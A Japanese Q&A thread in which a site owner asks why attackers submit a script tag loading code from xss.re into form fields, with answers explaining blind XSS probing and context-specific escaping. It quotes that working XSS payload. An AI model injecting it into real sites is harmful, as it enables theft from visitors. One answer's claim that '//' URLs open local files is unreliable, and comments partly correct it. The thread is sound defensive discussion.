質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.50%
PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

JavaScript

JavaScriptは、プログラミング言語のひとつです。ネットスケープコミュニケーションズで開発されました。 開発当初はLiveScriptと呼ばれていましたが、業務提携していたサン・マイクロシステムズが開発したJavaが脚光を浴びていたことから、JavaScriptと改名されました。 動きのあるWebページを作ることを目的に開発されたもので、主要なWebブラウザのほとんどに搭載されています。

Q&A

解決済

3回答

1642閲覧

攻撃っぽいのですが意図はなんでしょうか?

yoyoyoyogi

総合スコア47

PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

JavaScript

JavaScriptは、プログラミング言語のひとつです。ネットスケープコミュニケーションズで開発されました。 開発当初はLiveScriptと呼ばれていましたが、業務提携していたサン・マイクロシステムズが開発したJavaが脚光を浴びていたことから、JavaScriptと改名されました。 動きのあるWebページを作ることを目的に開発されたもので、主要なWebブラウザのほとんどに搭載されています。

1グッド

3クリップ

投稿2017/05/12 01:46

私が運営する稚拙なサイトですが、最近フォームにスクリプトを入れてくる攻撃にあっています。
エスケープはしているのでそれ自体は問題無いと思うのですが意図がわからず怖いです。

具体的には名前欄や住所欄に
"><script src=//xss.re/692></script>

知識が少ないので良くわからないのですが、これは何を意図してこんな事して来ているのででしょうか?
よろしくお願いします。

nagaetty👍を押しています

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

guest

回答3

0

ベストアンサー

XSSが仕込めるとわかれば、閲覧者のブラウザをDDoS攻撃のスレーブにすることもできますから、そのサイトの情報自体が目当てでなくとXSS攻撃する価値はあります。そうすると、何か投稿できそうなサイトは片っ端から「とりあえずドアノブを回してみる」やつが出てくるわけです。

投稿2017/05/12 01:59

yuba

総合スコア5568

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

yoyoyoyogi

2017/05/12 02:38

ありがとうございます。 なるほど、手当たり次第って言うのもあるのですね。 ちなみにこれはエスケープしていれば被害は無い、と言う理解で大丈夫でしょうか。
yuba

2017/05/12 11:16

エスケープにもいろいろあります。 正しいエスケープは「出力の際に、出力先に応じてエスケープ」です。例えばHTMLを生成する際にすべきエスケープとJavaScriptを動的出力する際にすべきエスケープは異なりますので。今どきはないですがSQLを組み立てる際もまた、です。 出力先を問わずに「安全」なエスケープというのはできませんので、受け取ったときに時にエスケープしているとしたら誤りです。(「サニタイズ言うな」でぐぐってみてください) それさえ守れていれば問題ないでしょう。
mike2mike4

2017/05/12 11:32

総当たり式のアタックはよくありますね。 昔、Linux+Apache+PHPで自宅サーバーを作った際、IISのエライ昔のセキュリティホールを狙った攻撃が頻発してました。
guest

0

Script tag loading “xss.re/692” in e-commerce transaction data - real attack or something else?みたいですね。

日本語翻訳で見ると、アクセスしてきた人の情報を収集するものみたいです。

投稿2017/05/12 01:53

yoorwm

総合スコア1305

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

yoyoyoyogi

2017/05/12 02:41

ありがとうございます。 攻撃者が自分で特定のサイトにアクセスするスクリプトを入れて、誰がそのサイトに飛ぶのでしょうか? 例えば私が、「あれ?これなんだろう?」と不思議に思ってグーグルなどでこのサイトを検索する事を狙っているのでしょうか? ごめんなさい、多分凄く初心者的な馬鹿な事を聞いていると思うですが、もしよかったらもう少し詳しく教えて頂けると嬉しいです。
yoorwm

2017/05/12 03:15

googleで翻訳すると「攻撃が成功した場合、注射が行われた場所を訪れる人は、」という訳の分からない日本語になっていますが、攻撃が成功するとスクリプトが埋め込まれ、埋め込まれたページを訪れた人は・・・という感じかと思います。
guest

0

"><script src=//xss.re/692></script>
このHTMLをブラウザで表示すると
"><script src=//xss.re/692></script

こうなります。

<input type="text" value"">
このテキストボックスに先ほどのデータを入力すると、
<input type="text" value""><script src=//xss.re/692></script">
となってスクリプトを埋め込めます。

//xss.re/692
これは自前のスクリプトなんですかね
//から入力するとクライアントのローカルファイルにアクセスするので、その可能性があります。

投稿2017/05/12 02:33

intelf___

総合スコア868

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

yoyoyoyogi

2017/05/12 02:37

ありがとうございます。 >//xss.re/692 これは自前のスクリプトなんですかね //から入力するとクライアントのローカルファイルにアクセスするので、その可能性があります。 と教えて頂いてる部分が理解できませんでした。(バカですいません。。。) もう少し詳しく教えて頂けると嬉しいです。
intelf___

2017/05/12 06:14

あ、そうなんですね ブラウザで書くと//はローカルファイルだったのですが、jsではまた挙動が違うのですね。 ありがとうございます。
kei344

2017/05/12 06:18 編集

ブラウザでのことですよ。 ローカルにあるHTMLファイルを開いた場合 file:// の file:部分が省略されますが、それは(たしか)読み込まれないと思います。
think49

2017/05/12 09:45

To: intelf___ さん //で始まるURIは「対象の文書ファイルと同じスキームで参照」しますので、文書がfile://スキームで参照されているなら、リンク先もfile://で参照される、と思います(未検証)。 RFC3986では「ネットワークパス参照」といいます。 https://triple-underscore.github.io/RFC3986-ja.html#section-4.2 URL Standard では「スキーム相対特別 URL 文字列(scheme-relative-special-URL string)」ですが、長すぎて分かりづらいですね。 https://url.spec.whatwg.org/#url-writing https://triple-underscore.github.io/URL-ja.html#url-writing
guest

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.50%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問